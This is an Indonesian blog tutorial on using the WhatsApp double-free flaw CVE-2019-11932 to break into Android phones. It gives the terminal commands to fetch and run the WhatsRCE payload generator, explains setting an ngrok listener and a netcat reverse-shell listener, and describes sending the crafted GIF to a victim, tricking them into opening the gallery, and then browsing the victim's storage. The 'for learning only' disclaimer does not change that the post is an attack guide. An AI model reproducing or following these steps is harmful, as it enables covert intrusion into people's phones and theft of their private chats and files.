Cara Sadap WhatsApp Dengan RCE CVE-2019-11932

Diposting pada

Baru baru ini Dunia Cyber di hebohkan dengan munculnya bug WhatsApp terbaru pada 2 Oktober 2019 yaitu Exploit RCE (Remote Code Execution) CVE-2019-11932 – Exploit ini hanya berjalan pada android 8.1 & 9.0, jadi Team nougat, kitkat dan lolipop santuy saja.

Exploit itu ditemukan oleh Security Researcher asal Vietnam bernama PHAM HONG NHAT.

Nama bug asli ini adalah double-free memory corruption dan di sulap menjadi Exploit RCE (Remote Code Execution), Apa itu RCE? yaitu meremot sistem dengan menggunakan code injection, Exploit ini bisa mencuri data korban seperti log chat, file, gambar dan menghapus seluruh data hanya dengan mengirim documents berupa GIF.

Baca Juga : Spam SMS Unlimited Termux Terbaru 2019

Bagaimana cara bug ini bekerja? kita cukup mengirim documents payload semacam code injection disisipkan menjadi gif dan dikirim ke whatsapp si korban, Jika kita sudah friend atau save nomor WhatsApp korban, Maka kita tidak perlu menunggu di klik/dibuka si korban.

Untuk mengatasi masalah bug WhatsApp RCE CVE-2019-11932 kita perlu update whatsapp ke versi terbaru 2.19.244 atau jangan pakai android versi 8 dan 9 hahaha.

Lalu bagaimana cara membuat file GIF tersebut, Kita hanya perlu membuat payload dengan Tools Generate Payload GIF RCE yaitu WhatsRCE yang dibutuhkan untuk membuat payolad tersebut yaitu Terminal seperti Linux, CMD untuk komputer dan Termux untuk di HP Android.

Baca Juga : Cara Sadap WhatsApp menggunakan Termux Metasploit

Disini Saya Akan Memberikan Tutorial WhatsApp Remote Code Execution

Anda bisa menggunakan aplikasi Termux (Download di Play Store) dan menggunakan Linux.

Buka terminal anda dan masukkan command berikut.

sudo apt install git (enter)
git clone https://github.com/KeepWannabe/WhatsRCE (enter)
cd WhatsRCE && bash start.sh (enter)

Selanjutnya cara mendapatkan akses Shell.

Baca Juga  Latihan Soal Pilihan Ganda Perbankan Dasar

Masukkan Host Listener dan Port anda, Bisa menggunakan ngrok.

Anda perlu mengirim file GIF ke korban (DOKUMEN BUKAN GAMBAR) dan atur nc / netcat ke port yang Anda atur di tool WhatsRCE nc -lnvp your_port

Agar Exploit ini bekerja beri tahu korban untuk membuka galeri melalui WhatsApp, Setelah itu beberapa detik kemudian Anda akan menerima koneksi shell dari korban.

Selanjutnya anda bisa melihat semua isi directory HP korban dengan ketik perintah ls -la /sdcard dan membuka folder dengan perintah cd namafolder.

Tutorial ini hanya untuk pembelajaran jadi manfaatkan untuk kebaikan yaa.

Jika anda mengalami kesulitan melakukan tutorial di atas, Silahkan berkomentar.


Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *